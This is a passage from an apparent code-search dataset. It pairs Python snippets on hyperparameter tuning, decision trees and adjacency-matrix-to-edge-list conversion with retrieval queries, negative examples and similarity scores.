user-friendly name for the parameter name using regexs\n #Look for a match for global parameters: Vector=Values[Test parameter],\n global_string = r'.*Vector=Values\\[(?P<name>.*)\\].*'\n global_string_re = re.compile(global_string)\n global_match = re.match(global_string_re, name)\n \n if global_match:\n name = global_match.group('name')\n \n #else check for a local match.\n #Vector=Reactions[Reaction] Parameter=k1\n local_string = r'.*Vector=Reactions\\[(?P<reaction>.*)\\].*Parameter=(?P<parameter>.*),Reference=Value.*'\n local_string_re = re.compile(local_string)\n local_match = re.match(local_string_re, name)\n \n if local_match:\n reaction = local_match.group('reaction')\n parameter = local_match.group('parameter')\n name = '(%s).%s'%(reaction, parameter)\n\n parameters.append((name, lowerBound, upperBound, startValue))\n\n return parameters", "def __init__(self,\r\n max_depth=None,\r\n min_samples_split=2,\r\n min_samples_leaf=1,\r\n split_criterion=None,\r\n feature_selection=None,\r\n feature_prob=None,\r\n min_gain_split=0,\r\n split_chooser=None):\r\n self._n_classes = None\r\n self._max_depth = None\r\n self._split_criterion = None\r\n self._split_chooser = None\r\n self._feature_selection = None\r\n self._min_samples_split = None\r\n self._min_samples_leaf = None\r\n self._min_gain_split = None\r\n self._feature_prob = None\r\n\r\n if max_depth is None or max_depth > 0:\r\n self._max_depth = max_depth\r\n else:\r\n raise(ValueError(\"The depth of the tree must be greater than 0.\"))\r\n\r\n if split_criterion is not None:\r\n self._split_criterion = split_criterion\r\n else:\r\n raise (ValueError(\"The split criterion can not be None.\"))\r\n\r\n if split_chooser is not None:\r\n self._split_chooser = split_chooser\r\n else:\r\n raise (ValueError(\"The split chooser can not be None.\"))\r\n\r\n if feature_selection is not None:\r\n self._feature_selection = feature_selection\r\n else:\r\n raise (ValueError(\"The feature selection can not be None.\"))\r\n\r\n if min_samples_split is not None and min_samples_split > 1:\r\n self._min_samples_split = min_samples_split\r\n else:\r\n raise(ValueError(\"The min_samples_split must be greater than 1.\"))\r\n\r\n if min_samples_leaf is not None and min_samples_leaf > 0:\r\n self._min_samples_leaf = min_samples_leaf\r\n else:\r\n raise(ValueError(\"The min_samples_leaf must be greater than 0.\"))\r\n\r\n if min_gain_split is not None and min_gain_split >= 0:\r\n self._min_gain_split = min_gain_split\r\n else:\r\n raise(ValueError(\"The min_gain_split must be greater or equal than 0.\"))\r\n\r\n if feature_prob is not None:\r\n self._feature_prob = feature_prob", "def test_best_val(self, te_acc):\n self.test_val = te_acc", "def doParametersOfInterest(self):\n\n self.modelBuilder.doVar(\"eAfb[0.6,-0.75,0.75]\");\n self.modelBuilder.doVar(\"eA0[0.05, -1.0, 1.0]\");\n self.modelBuilder.doVar(\"dAfb[0.,-0.75,0.75]\");\n self.modelBuilder.doVar(\"dA0[0.0, -1.0, 1.0]\");\n #self.modelBuilder.doSet(\"POI\",\"dAfb,dA0\")\n self.modelBuilder.doSet(\"POI\",\"dAfb\")\n self.modelBuilder.factory_('expr::mAfb(\"@0+@1\",eAfb,dAfb)')\n self.modelBuilder.factory_('expr::mA0(\"(@0+@1)\",eA0,dA0)')\n\n \n self.modelBuilder.factory_('expr::eAlph(\"2.0*@0/(2.0-@0)\",eA0)')\n self.modelBuilder.factory_('expr::eNorm(\"3.0/4.0/(2.0+@0)\",eAlph)')\n self.modelBuilder.factory_('expr::eRAlph(\"@0*@1\",eAlph,eNorm)')\n self.modelBuilder.factory_('expr::eRpl(\"(@0+@1)\",eNorm,eAfb)')\n self.modelBuilder.factory_('expr::eRmn(\"(@0-@1)\",eNorm,eAfb)')\n\n 
self.modelBuilder.factory_('expr::mAlph(\"2.0*@0/(2.0-@0)\",mA0)')\n self.modelBuilder.factory_('expr::mNorm(\"3.0/4.0/(2.0+@0)\",mAlph)')\n self.modelBuilder.factory_('expr::mRAlph(\"@0*@1\",mAlph,mNorm)')\n self.modelBuilder.factory_('expr::mRpl(\"(@0+@1)\",mNorm,mAfb)')\n self.modelBuilder.factory_('expr::mRmn(\"(@0-@1)\",mNorm,mAfb)')", "def branching(self, df, layer, side):\n min_err = 1\n # Search for the best cut\n for i in range(self.dim):\n ddf = df.sort_values(i)\n Y = ddf.y.values\n\n for j in range(1, len(ddf)):\n err = self.impurity(Y, j)\n if err < min_err:\n best_d, best_val, min_err = i, ddf.iloc[j][i], err\n\n # Record the best branching parameters at this node\n self.Branch[(layer, side)] = best_d, best_val\n return best_d, best_val", "def kbest(X, y, select_method, pipeline):\n\n # Fitting the tuned pipeline to the whole dataset and extracting the\n # selected features\n pipe = pipeline.fit(X=X, y=y)\n if select_method is 'enet':\n coefs = (pipe\n .best_estimator_\n .named_steps['selector']\n .estimator_\n .coef_[pipe\n .best_estimator_\n .named_steps['selector']\n .get_support()])\n elif select_method is 'f-test':\n coefs = (pipe\n .best_estimator_\n .named_steps['selector']\n .scores_[pipe\n .named_steps['selector']\n .get_support()])\n else:\n raise ValueError(\"\"\"Must specify feature selection technique \n in select method\"\"\")\n \n # Getting feature names\n names = (X\n .columns\n .values[pipe\n .best_estimator_\n .named_steps['selector']\n .get_support()])\n names_scores = list(zip(names, coefs))\n kbest_df = (pd\n .DataFrame(data=names_scores,\n columns=['Features',\n 'Coefs'])\n .sort_values(by='Coefs',\n ascending=False))\n\n # Filtering out zeroed coefficients from the elastic net that were not\n # removed in SelectFromModel\n if select_method is 'enet':\n kbest_df = kbest_df.loc[(kbest_df['Coefs'] != 0.000000)\n | kbest_df['Coefs'] != -0.000000]\n else:\n pass\n\n # Getting the tuned parameters\n optimal_params = pipeline.best_params_\n params_df = pd.DataFrame.from_dict(data=optimal_params,\n orient='index',\n columns=['Parameters'])\n best_inner_cv_test_score = pipeline.best_score_\n\n return kbest_df, params_df, best_inner_cv_test_score", "def obtain_training_parameters(para, x, y, alg = 'LR'):\n \n \n global omega\n \n # Iterate to find the optimal parameters\n if alg == 'LR': # logistic regression\n omega = np.zeros((3, 1))\n alpha = para.step_size # step size\n for i in range(para.iteration):\n grad = np.zeros((3, 1))\n for i in range(len(x[:, 0])):\n grad += np.reshape(x[i, :], (3, 1)) * (-y[i] + 1 / (1 + np.exp(-np.dot(x[i, :], omega))))\n omega -= alpha * grad \n \n elif alg == 'GNB': # Gaussian Naive Bayes\n # get counts for each class\n itszero = 0\n itsone = 0\n for i in range(len(y)):\n if y[i] == 1:\n itsone += 1\n else:\n itszero += 1\n \n # probability of see y\n theta0 = itszero / len(y)\n theta1 = 1 - theta0\n \n # mean of omega\n mew00 = 0\n mew01 = 0\n mew02 = 0\n mew10 = 0\n mew11 = 0\n mew12 = 0\n for i in range(len(y)):\n if y[i] == 0:\n mew00 += x[i, 0] / itszero\n mew01 += x[i, 1] / itszero\n mew02 += x[i, 2] / itszero\n else:\n mew10 += x[i, 0] / itsone\n mew11 += x[i, 1] / itsone\n mew12 += x[i, 2] / itsone\n \n # variance of omega \n sigma00 = 0\n sigma01 = 0\n sigma02 = 0\n sigma10 = 0\n sigma11 = 0\n sigma12 = 0\n for i in range(len(y)):\n if y[i] == 0:\n sigma00 += (x[i, 0] - mew00)**2 / itszero\n sigma01 += (x[i, 1] - mew01)**2 / itszero\n sigma02 += (x[i, 2] - mew02)**2 / itszero\n else:\n sigma10 += (x[i, 0] - mew10)**2 / 
itsone\n sigma11 += (x[i, 1] - mew11)**2 / itsone\n sigma12 += (x[i, 2] - mew12)**2 / itsone\n \n # store these parameters into the name \"omage\"\n omega = [theta0, theta1, mew00, mew01, mew02, mew10, mew11, mew12,\n sigma00, sigma01, sigma02, sigma10, sigma11, sigma12] \n \n else: # Gaussian Mixture\n pass\n \n return omega", "def get_params(self, deep=True):\n return super(AveragingRegressor, self)._get_params('estimators', deep=deep)", "def fit(train_data, train_target):\r\n for name in models.keys():\r\n est = models[name]\r\n est_params = params2[name]\r\n gscv = GridSearchCV(estimator=est, param_grid=est_params, cv=5)\r\n gscv.fit(train_data, train_target)\r\n print(\"best parameters are: {}\".format(gscv.best_estimator_))\r\n print(\"Where we selected the parameters: {}\" .format(gscv.cv_results_['params'][gscv.best_index_]))\r\n print(\"with mean cross-validated score: {}\" .format(gscv.best_score_))", "def get_bestparameter(self):\n if self._df_test is None:\n raise RuntimeError('get_bestparameter: please the '\n 'train model first')\n mean = self._df_test.mean(axis=1)\n if len(mean) == 1:\n result = mean.idxmax()\n elif len(mean) == 2:\n result = mean.loc[mean.index > 1].idxmax()\n else:\n result = mean.loc[mean.index > 2].idxmax()\n return result", "def get_bestparameter(self):\n if self._df_test is None:\n raise RuntimeError('get_bestparameter: please the '\n 'train model first')\n mean = self._df_test.mean(axis=1)\n if len(mean) == 1:\n result = mean.idxmax()\n elif len(mean) == 2:\n result = mean.loc[mean.index > 1].idxmax()\n else:\n result = mean.loc[mean.index > 2].idxmax()\n return result", "def find_best_params(self, n_trials=120):\r\n self.logger_object.log(\r\n self.file_object,\r\n \"Entered find_best_params method of HyperparametersTuner class.\",\r\n )\r\n try:\r\n optimization_function = partial(self.optimize)\r\n study = optuna.create_study(direction=\"maximize\")\r\n study.optimize(optimization_function, n_trials=n_trials)\r\n self.logger_object.log(\r\n self.file_object, f\"Successfully ran {n_trials} optuna study trials.\"\r\n )\r\n\r\n self.tuned_hyperparams[\"LGBM Regression\"].append(study.best_params)\r\n self.logger_object.log(\r\n self.file_object,\r\n \"Successfully appended best model parameters as a dictionary.\",\r\n )\r\n\r\n with (open(str(Config.TUNED_HYPERPARAMS_FILE_PATH), \"w\")) as outfile:\r\n json.dump(self.tuned_hyperparams[\"LGBM Regression\"], outfile, indent=1)\r\n self.logger_object.log(\r\n self.file_object,\r\n \"Successfully dumped the best parameters in best_params.json .\",\r\n )\r\n except Exception as e:\r\n self.logger_object.log(\r\n self.file_object,\r\n f\"Exception occured in find_best_params method of HyperparametersTuner class. Exception message: {e}\",\r\n )\r\n self.logger_object.log(\r\n self.file_object,\r\n \"Dumping best parameters unsuccessful. 
Exited find_best_params method of HyperparametersTuner class\",\r\n )\r\n raise Exception()", "def set_optimal_parameters(self):\n # Getting the best trial based on the test errors\n idx = self.trial_losses.index(min(self.trial_losses))\n self.best_trial = self.trial_list[idx]\n self.objective.parse_trial(self.best_trial)", "def _find_svm_rbf_params(df, metrics, kernel):\n context = ramp.DataContext(data=df)\n config = ramp.Configuration(target=\"target\",\n features=[ramp.BaseFeature(x) for x in metrics])\n x, y = ramp.models.get_xy(config, context)\n\n if kernel == \"linear\":\n param_grid = dict(C=10.0 ** np.arange(-2, 5))\n else:\n param_grid = dict(gamma=10.0 ** np.arange(-5, 4),\n C=10.0 ** np.arange(-2, 9))\n grid = sklearn.grid_search.GridSearchCV(sklearn.svm.SVC(kernel=kernel),\n param_grid=param_grid,\n cv=sklearn.cross_validation.StratifiedKFold(y=y, k=3),\n verbose=True)\n grid.fit(x, y)\n print grid.best_estimator_\n out = {}\n for attr in param_grid.keys():\n out[attr] = getattr(grid.best_estimator_, attr)\n return out", "def random_parameters():\n res = dict()\n res[\"population_size\"] = random.randrange(2, 21)\n res[\"mutation_prob\"] = random.choice([0.02, 0.05, 0.10, 0.20, 0.30, 0.40, 0.50])\n res[\"crossover\"] = random.choice([True, False])\n res[\"selection\"] = random.choice([True, False])\n res[\"sigma\"] = random.choice([0.1, 0.25, 0.5, 1])\n res[\"crossover_method\"] = random.choice([\"single_swap\", \"uniform_swap\", \"arithmetic\"])\n res[\"selection_method\"] = random.choice([\"truncated\", \"fitness_based\", \"rank_based\"])\n res[\"best_rate\"] = random.choice([0.2, 0.3, 0.5])\n res[\"n_parents\"] = random.choice([2, 3, 4])\n res[\"elitism\"] = random.choice([True, False])\n return res", "def decision_function(self, X):\n ...", "def _choose_best_option(self):", "def main(args):\n if args.train_test_split < 0.2 or args.train_test_split > 0.8:\n print(\"Bad value for train_test_split, range is 0.2 - 0.8\")\n sys.exit()\n\n dataset = pd.read_csv(args.train_file)\n\n x_data = dataset.loc[:, (dataset.columns != args.classification_column) \\\n & (dataset.columns != \"Survey_id\")]\n y_data = dataset[args.classification_column].to_numpy()\n dataset_headers = list(x_data.columns)\n x_data = x_data.fillna(0).to_numpy()\n\n x_train, x_test, y_train, y_test = train_test_split(x_data, y_data, \\\n test_size=args.train_test_split)\n\n\n dtc = DecisionTreeClassifier(max_depth=args.max_depth, \\\n min_impurity_split=args.acceptable_impurity)\n dtc = dtc.fit(x_train, y_train)\n dtc_score = dtc.score(x_test, y_test)\n\n\n export_graphviz(dtc, out_file=\"decision_tree.dot\", feature_names=dataset_headers, \\\n rounded=True, precision=1, filled=True)\n os.system(\"dot -Tpng decision_tree.dot -o decision_tree.png\")\n\n\n rfc = RandomForestClassifier(n_estimators=args.estimators, max_depth=args.max_depth, \\\n min_impurity_split=args.acceptable_impurity)\n rfc.fit(x_train, y_train)\n rfc_score = rfc.score(x_test, y_test)\n\n file = open('result.txt', 'w')\n file.write(f'Decisions tree score = {dtc_score}\\n')\n file.write(f'Random forest score = {rfc_score}\\n')\n file.close()", "def finetune_depth():\n start_depth = 3\n tol = 10E-4\n best_depth = start_depth\n acc = [-1]\n for i in tqdm(range(20),desc='Progress(max_depth)',ncols=70,smoothing=0.5):\n XGBCla = get_XGBmodel(depth=i+start_depth)\n XGBCla.fit(X_train, y_train)\n pred = XGBCla.predict(X_test)\n acc.append(accuracy_score(y_test, pred))\n if (abs(acc[i]-acc[i+1])<tol):\n break\n if (acc[i]<acc[i+1]):\n best_depth = 
start_depth + i\n print(\"Accuracy: %.4f\" % acc[-1])\n print(\"Best depth: %d\" % best_depth)", "def optimize_parameters(self):\n pass", "def optimize_parameters(self):\n pass", "def optimize_parameters(self):\n pass", "def __init__(self, n_estimators=10, max_features=None, min_samples_split=10, max_depth=None, criterion=None):\n self.max_depth = max_depth\n self.min_samples_split = min_samples_split\n self.max_features = max_features\n self.n_estimators = n_estimators\n self.trees = []", "def objective(params, n_folds=N_FOLDS):\n\n # Perform n_fold cross validation with hyperparameters\n # Use early stopping and evalute based on ROC AUC\n params['num_leaves'] = int(params['num_leaves'])\n params['min_data_in_leaf'] = int(params['min_data_in_leaf'])\n params['max_bin'] = int(params['max_bin'])\n # params['min_child_samples'] = int(params['min_child_samples'])\n print(params)\n cv_results = lgb.cv(params, train_data, nfold=n_folds, num_boost_round=5000,\n early_stopping_rounds=40, metrics='auc', seed=50)\n print(cv_results)\n save_log(str(params) + \"\\n\\n\\n\\n\\n\" + str(cv_results))\n # Extract the best score\n best_score = max(cv_results['auc-mean'])\n\n # Loss must be minimized\n loss = 1 - best_score\n\n # Dictionary with information for evaluation\n return {'loss': loss, 'params': params, 'status': STATUS_OK}", "def test_decision_tree(train,test,maxnodes=None):\n tree = DecisionTree()\n tree.maxnodes = maxnodes\n errors = tree.learn(train,'label')\n print \"Decision tree makes\",errors,\"errors\"\n print \"Depth\",tree.depth(),\"nodes\",tree.numNodes()\n if tree.numNodes() < 100:\n tree.pprint()\n if errors > 0:\n print \"Training errors:\"\n for id,e in enumerate(train.entries):\n res = tree.predict(e[:-1])\n if res != e[-1]:\n if len(e[:-1]) > 10:\n print \" Error on\",id,\"prediction\",res\n else:\n print \" Error on\",e[:-1],\"prediction\",res\n print \"Testing error:\"\n tp,tn,fp,fn = 0,0,0,0\n for e in test.entries:\n res = tree.predict(e[:-1])\n if res and e[-1]:\n tp += 1\n elif res and not e[-1]:\n fp += 1\n elif not res and e[-1]:\n fn += 1\n else:\n tn += 1\n Ntest = len(test.entries)\n print \"True +: %g, True -: %g\"%(float(tp)/Ntest,float(tn)/Ntest) \n print \"False -: %g, False +: %g\"%(float(fn)/Ntest,float(fp)/Ntest)\n print \"Overall error: %g\"%(float(fn+fp)/Ntest,)", "def decision_tree_prediction(example, root, attributes):\n # If reached a leaf node, return the label\n if isinstance(root, str):\n return root\n\n # Attribute that was split on\n attribute = root.attribute\n # Column of the attribute that was split on\n i = get_index(attribute, attributes)\n testValue = example[i]\n # Check every child to see what path the example must take in the decision tree\n for child in root.children:\n if isinstance(child.branch, int):\n if int(testValue) <= child.branch:\n return decision_tree_prediction(example, child.nextTree, attributes)\n elif isinstance(child.branch, float):\n if int(testValue) > child.branch:\n return decision_tree_prediction(example, child.nextTree, attributes)\n# -----------------------------------------------Naive Bayes-------------------------------------------------\n # Naive bayes\n elif child.branch == \"Naive\":\n yes_probability = child.histogram[0]\n no_probability = child.histogram[2]\n i = 0\n for feature in example:\n if feature == \"yes\" or feature == \"no\":\n continue\n if i == 0 or i == 2 or i == 4 or i == 10 or i == 11 or i == 12:\n j = 0\n # Its a float so check\n for key in child.histogram[1][attribute_index[i]]:\n if 
float(feature) <= float(key) and j == 0:\n yes_probability = yes_probability * child.histogram[1][attribute_index[i]][key]\n elif j == 1:\n yes_probability = yes_probability * child.histogram[1][attribute_index[i]][key]\n j += 1\n for key in child.histogram[1][attribute_index[i]]:\n if float(feature) <= float(key) and j == 0:\n no_probability = no_probability * child.histogram[1][attribute_index[i]][key]\n elif j == 1:\n no_probability = no_probability * child.histogram[1][attribute_index[i]][key]\n j += 1\n else:\n yes_probability = yes_probability * child.histogram[1][attribute_index[i]][feature]\n no_probability = no_probability * child.histogram[3][attribute_index[i]][feature]\n i += 1\n if yes_probability > no_probability:\n return \"yes\"\n elif no_probability >= yes_probability:\n return \"no\"\n# -----------------------------------------------End Naive Bayes-------------------------------------------------\n else:\n if child.branch == testValue:\n return decision_tree_prediction(example, child.nextTree, attributes)" ]
[ "0.73654014", "0.6803678", "0.6700777", "0.669526", "0.6686797", "0.6683199", "0.6660834", "0.6638287", "0.65660405", "0.65332466", "0.65164715", "0.64410394", "0.64108276", "0.64031994", "0.6387443", "0.6330438", "0.62947744", "0.6267406", "0.6226899", "0.62210745", "0.61950547", "0.618679", "0.61643577", "0.6163556", "0.6158607", "0.6140857", "0.6135676", "0.6116667", "0.6091666", "0.6084619", "0.60827655", "0.6080633", "0.60618925", "0.6037695", "0.5986126", "0.592798", "0.59256274", "0.5898142", "0.58902293", "0.58860433", "0.5875145", "0.5862947", "0.58574337", "0.584349", "0.5825657", "0.58058083", "0.5780037", "0.5764929", "0.5764364", "0.5753339", "0.57469946", "0.573422", "0.57211196", "0.5718937", "0.5718334", "0.57156014", "0.5712901", "0.57094085", "0.570826", "0.5704828", "0.56995875", "0.5681553", "0.5677757", "0.5673165", "0.5658144", "0.56543714", "0.56537396", "0.56529766", "0.5651769", "0.5645861", "0.5643615", "0.56387806", "0.5635343", "0.5625096", "0.5620358", "0.56175774", "0.56160766", "0.5610746", "0.56046945", "0.55999774", "0.5597112", "0.5594707", "0.5594528", "0.55882645", "0.55882645", "0.5571795", "0.5569187", "0.5568148", "0.5563414", "0.5560228", "0.55599165", "0.555667", "0.55494547", "0.55485594", "0.55485594", "0.55485594", "0.5548198", "0.55373305", "0.55371124", "0.55340207" ]
0.74380594
0
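The document fragment that closes the record above estimates two-class Gaussian parameters feature by feature (priors theta0/theta1, per-feature means mew and variances sigma) and packs them into omega. As an illustration only, not part of the dataset, a vectorized NumPy sketch of the same estimate follows; the input names x (an n-by-3 NumPy feature matrix) and y (a length-n binary NumPy label array) are assumptions.

import numpy as np

def estimate_omega(x, y):
    # Class priors theta0, theta1 taken from the label frequencies.
    theta = [float(np.mean(y == 0)), float(np.mean(y == 1))]
    # Per-class, per-feature means (mew00..mew02, mew10..mew12) and variances
    # (sigma00..sigma02, sigma10..sigma12), in the same order the fragment
    # above uses when it builds omega.
    means = [x[y == c].mean(axis=0) for c in (0, 1)]
    varis = [x[y == c].var(axis=0) for c in (0, 1)]
    return theta + list(means[0]) + list(means[1]) + list(varis[0]) + list(varis[1])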
Converts a binary adjacency matrix to a list of directed edges
def to_adj_list(adj_matrix): adj_list = [] assert (adj_matrix.shape[0] == adj_matrix.shape[1]) for idx in range(adj_matrix.shape[0]): for jdx in range(idx, adj_matrix.shape[0]): if adj_matrix[idx, jdx] == 1: adj_list.append([idx, jdx]) return adj_list
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def edges(adj_mat, vertices):\n return [(i,j) for i,j in\n vertices if (i < j and adj_mat[i][j] == 1)]", "def matrix_to_edges(matrix: numpy.ndarray, include_reverse_edges: bool=True):\n sparse = scipy.sparse.coo_matrix(matrix)\n edges = zip(sparse.row, sparse.col)\n\n if not include_reverse_edges:\n edges = filter(lambda edge: edge[0] <= edge[1], edges)\n return list(edges)", "def _square_adjacency_matrix_to_edgelist(matrix, indices_to_ids):\n\n\tdf_of_matrix = pd.DataFrame(matrix)\t\t\t\t\t\t\t\t\t# Convert the numpy array to a pandas dataframe.\n\tboolean_triu = np.triu(np.ones(df_of_matrix.shape)).astype(np.bool)\t# Create a boolean array of same shape where upper triangle is true.\n\tdf_of_matrix = df_of_matrix.where(boolean_triu)\t\t\t\t\t\t# Make everything but the upper triangle NA so it is ignored by stack.\n\tmelted_matrix = df_of_matrix.stack().reset_index()\t\t\t\t\t# Melt (stack) the array so the first two columns are matrix indices.\n\tmelted_matrix.columns = [\"from\", \"to\", \"value\"]\t\t\t\t\t\t# Rename the columns to indicate this specifies a graph.\n\tmelted_matrix[\"from\"] = pd.to_numeric(melted_matrix[\"from\"])\t\t# Make sure node names are integers because IDs have to be integers.\n\tmelted_matrix[\"to\"] = pd.to_numeric(melted_matrix[\"to\"])\t\t\t# Make sure node names are integers because IDs have to be integers.\n\tmelted_matrix[\"from\"] = melted_matrix[\"from\"].map(indices_to_ids)\t# Rename the node names to be IDs from the dataset not matrix indices.\n\tmelted_matrix[\"to\"] = melted_matrix[\"to\"].map(indices_to_ids)\t\t# Rename the node names to be IDS from the dataset not matrix indices.\n\treturn(melted_matrix)\t\t\t\t\t\t\t\t\t\t\t\t# Return the melted matrix that looks like an edge list.", "def _rectangular_adjacency_matrix_to_edgelist(matrix, row_indices_to_ids, col_indices_to_ids):\n\tdf_of_matrix = pd.DataFrame(matrix)\t\t\t\t\t\t\t\t\t\t# Convert the numpy array to a pandas dataframe.\n\tmelted_matrix = df_of_matrix.stack().reset_index()\t\t\t\t\t\t# Melt (stack) the array so the first two columns are matrix indices.\n\tmelted_matrix.columns = [\"from\", \"to\", \"value\"]\t\t\t\t\t\t\t# Rename the columns to indicate this specifies a graph.\n\tmelted_matrix[\"from\"] = pd.to_numeric(melted_matrix[\"from\"])\t\t\t# Make sure node names are integers because IDs have to be integers.\n\tmelted_matrix[\"to\"] = pd.to_numeric(melted_matrix[\"to\"])\t\t\t\t# Make sure node names are integers because IDs have to be integers.\n\tmelted_matrix[\"from\"] = melted_matrix[\"from\"].map(row_indices_to_ids)\t# Rename the node names to be IDs from the dataset not matrix indices.\n\tmelted_matrix[\"to\"] = melted_matrix[\"to\"].map(col_indices_to_ids)\t\t# Rename the node names to be IDS from the dataset not matrix indices.\n\treturn(melted_matrix)\t\t\t\t\t\t\t\t\t\t\t\t\t# Return the melted matrix that looks like an edge list.", "def to_edges(graph):\n return list(zip(graph[:-1], graph[1:]))", "def adjacency_matrix(g):\n nodes = sorted(g.keys())\n adj = []\n for row_node in nodes:\n row = []\n for column_node in nodes:\n if column_node in g[row_node]:\n row.append(1)\n else:\n row.append(0)\n adj.append(row)\n \n return adj", "def generate_edges(graph):\n edges = []\n\n # for each node in graph\n for node in graph:\n\n # for each neighbour node of a single node\n for neighbour in graph[node]:\n # if edge exists then append\n edges.append((node, neighbour))\n return edges", "def getEdges(self):\n edgeList = []\n for v in self.adjList:\n for i in 
range(len(self.adjList[v])):\n edgeList.append((v, self.adjList[v][i]))\n return edgeList", "def edges(self):\n edge_list = []\n for node1 in self.node_dict:\n for node2 in self.node_dict[node1]:\n edge_list.append((node1,\n node2,\n self.node_dict[node1][node2]))\n return edge_list", "def getEdges(self):\n # for node in graph,\n # return node -> node for j in graph[node]\n\n return [\"->\".join([str(n1), str(n2)]) for n1 in self.graph.keys() for n2 in self.graph[n1]]", "def create_edgelist(self):\n self.edgelist = []\n \n for i in range(len(self.Adjmatrix)):\n for j in range(len(self.Adjmatrix)):\n if(self.Adjmatrix[i, j] == 1):\n middlex = 0.5*(self.x[i] + self.x[j])\n middley = 0.5*(self.y[i] + self.y[j])\n self.edgelist.append({\"start node\": i, \"end node\": j, \"link length\": self.Dismatrix[i, j], \"edgediameter\": self.edgediameter, \"middlex\": middlex, \"middley\": middley})", "def path_to_edges(self):\n\n edges = [0 for i in range(self.graph.num_edges)]\n\n for row in range(self.graph.rows):\n for col in range(self.graph.cols):\n if self.path[row][col]:\n if row + col < self.graph.cols - 1:\n if col < self.graph.cols - 1 and self.path[row][col + 1]:\n #print \"(%d,%d) (%d,%d)\" % (row, col, row, col + 1)\n edge_number = self.graph.diags[row + col] + 2 * row\n edges[edge_number] = 1\n if row < self.graph.rows - 1 and self.path[row + 1][col]:\n #print \"(%d,%d) (%d,%d)\" % (row, col, row + 1, col)\n edge_number = self.graph.diags[row + col] + 1 + 2 * row\n edges[edge_number] = 1\n else:\n col_dist = self.graph.cols - col - 1\n if col < self.graph.cols - 1 and self.path[row][col + 1]:\n #print \"(%d,%d) (%d,%d)\" % (row, col, row, col + 1)\n edge_number = self.graph.diags[row + col] + 2 * col_dist - 1\n edges[edge_number] = 1\n if row < self.graph.rows - 1 and self.path[row + 1][col]:\n #print \"(%d,%d) (%d,%d)\" % (row, col, row + 1, col)\n edge_number = self.graph.diags[row + col] + 2 * col_dist\n edges[edge_number] = 1\n \n\n return edges", "def edges(self, node):\n nID = self.n2ID[node]\n return [(self.ID2n[n1ID], self.ID2n[n2ID]) for (n1ID, n2ID) in self.G.edges(nID)]", "def edges_to_adjacency_matrix(mesh):\n adja = graph.edges_to_coo(mesh.edges,\n data=np.ones(len(mesh.edges),\n dtype=np.int8))\n\n return sparse.triu(adja) + sparse.tril(adja).transpose()", "def getEdges(self):\n\n return [(cell, vertice) for cell in self.adjacent.keys() for vertice in self.adjacent[cell]]", "def adjacencyLists():\r\n anyNeighbor = lambda u: any(self.neighbors(u))\r\n verticesWithNeighbors = filter(anyNeighbor, sorted(self.vertices()))\r\n return map(edgesFromVertex, verticesWithNeighbors)", "def adjacencyLists():\r\n anyNeighbor = lambda u: any(self.neighbors(u))\r\n verticesWithNeighbors = filter(anyNeighbor, sorted(self.vertices()))\r\n return map(edgesFromVertex, verticesWithNeighbors)", "def get_all_edges(self):\n \n ans = []\n for node_id in self.neighbors:\n for edge_to_neighbor in self.neighbors[node_id]:\n ans.append(edge_to_neighbor)\n\n return ans", "def edges(self):\n es = []\n for vertex1 in self.vertices():\n for vertex2 in self.out_vertices(vertex1):\n es.append(self[vertex1][vertex2])\n return es", "def adjacencyMatrix(R, edges):\n A = np.zeros((len(R),len(R)))\n for i in range(0, len(edges)):\n A[edges[i][0]][edges[i][1]] = 1\n return A", "def affgraph_to_edgelist(aff, nhood):\n node1, node2 = nodelist_from_shape(aff.shape[1:], nhood)\n return node1.ravel(), node2.ravel(), aff.ravel()", "def edges(self):\n return [(a, b) for a in self._consequences_of\n for b in 
self._consequences_of[a]]", "def get_edge_list(self):\n return [(edge.value, edge.node_from.value, edge.node_to.value) for edge in self.edges]", "def _mout_edges(nodes):\n n = nodes.shape[0]\n edges = []\n for i in range(0, n - 1):\n for j in range(i, n):\n if abs(nodes[i, 0] - nodes[j, 0]) > 1:\n break\n elif abs(nodes[i, 0] - nodes[j, 0]) == 1 and \\\n abs(nodes[i, 1] - nodes[j, 1]) == 0:\n edges.append([i, j])\n elif abs(nodes[i, 1] - nodes[j, 1]) == 1:\n edges.append([i, j])\n return edges", "def enumerate_links_around_node(self, node):\n\n l0 = self.node_link[node]\n l = l0\n edges = []\n traversing = True\n while traversing:\n edges.append(l)\n v = l[0]\n if v == node:\n l = self.pred_right[l]\n else:\n l = self.pred_left[l]\n if l0 == l:\n traversing = False\n if l0[1] == l[0] and l0[0] == l[1]:\n traversing = False\n #print v, l\n #raw_input('here')\n return edges", "def _adjacency_to_edges(adjacency):\n edges = set()\n for u in adjacency:\n for v in adjacency[u]:\n try:\n edge = (u, v) if u <= v else (v, u)\n except TypeError:\n # Py3 does not allow sorting of unlike types\n if (v, u) in edges:\n continue\n edge = (u, v)\n\n edges.add(edge)\n return edges", "def make_adjacency_list_from_edge_list(N, edges):\n adjacency_list = [[] for _ in range(N)]\n for e, (x, y, r) in enumerate(edges):\n adjacency_list[x].append((e, y, r))\n adjacency_list[y].append((e, x, r))\n return adjacency_list", "def get_edges(self) -> []:\n graph_edges = []\n\n for vertex in self.adj_list:\n for connection in self.adj_list[vertex]:\n if (vertex, connection) not in graph_edges and (connection, vertex) not in graph_edges:\n graph_edges.append((vertex, connection))\n\n return graph_edges", "def adjacencyList(elems):\n if len(elems.shape) != 2 or elems.shape[1] != 2:\n raise ValueError,\"\"\"Expected a set of 2-node elements.\"\"\"\n elems = elems.astype(int)\n ok = [ where(elems==i) for i in range(elems.max()+1) ]\n return [ list(elems[w[0],1-w[1]]) for w in ok ]", "def buildGraph(M: List[List[int]]) -> List:\n l = len(M)\n G = [Node(i) for i in range(l)]\n for i in range(len(M)):\n for j in range(len(M)):\n if M[i][j]:\n G[i].add_adjacent(G[j])\n return G", "def get_graph(adj):\n # remove all zeros rows and columns\n adj = adj[~np.all(adj == 0, axis=1)]\n adj = adj[:, ~np.all(adj == 0, axis=0)]\n adj = np.asmatrix(adj)\n G = nx.from_numpy_matrix(adj)\n return G", "def adjacency_matrix_to_dict_graph(adjacency_matrix):\n\n # Check if the matrix has the right shape\n number_row_edges = len(adjacency_matrix)\n number_col_edges = len(adjacency_matrix[0])\n assert len(adjacency_matrix) == len(adjacency_matrix[0]), \\\n f\"Expected number of row = number of columns. 
